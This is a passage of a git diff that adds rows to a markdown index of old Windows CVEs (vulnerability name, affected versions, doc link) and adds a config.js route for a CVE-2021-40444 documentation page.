+| [CVE-2009-2532](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-2532) |                     SMBv2 Command Value                      |                Windows 2008/Vista                |
+| [CVE-2009-0079](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-0079) |               Windows RPCSS Service Isolation                |                 Windows 2003/Xp                  |
+| [CVE-2008-4250](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4250) |                        Server Service                        |            Windows 2000/2003/Vista/Xp            |
+| [CVE-2008-4037](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4037) |                  SMB Credential Reflection                   |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2008-3464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-3464) |                     AFD Kernel Overwrite                     |                 Windows 2003/Xp                  |
+| [CVE-2008-1084](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-1084) |                          Win32.sys                           |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2006-3439](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2006-3439) |                    Remote Code Execution                     |               Windows 2000/2003/Xp               |
+| [CVE-2005-1983](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2005-1983) |                         PnP Service                          |                 Windows 2000/Xp                  |
+| [CVE-2003-0352](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2003-0352) |               Buffer Overrun In RPC Interface                |             Windows 2000/2003/Xp/Nt              |
 
 
diff --git a/docs/Docs/config.js b/docs/Docs/config.js
index e03df7b..3402fa7 100644
--- a/docs/Docs/config.js
+++ b/docs/Docs/config.js
@@ -243,6 +243,9 @@ let config = {
                 {
                         path: '/CN/CVE-2021-36934', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/CVE-2021-36934/README.md'
                 },
+                {
+                        path: '/CN/CVE-2021-40444', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/CVE-2021-40444/README.md'
+                },
             ]
         },
     ],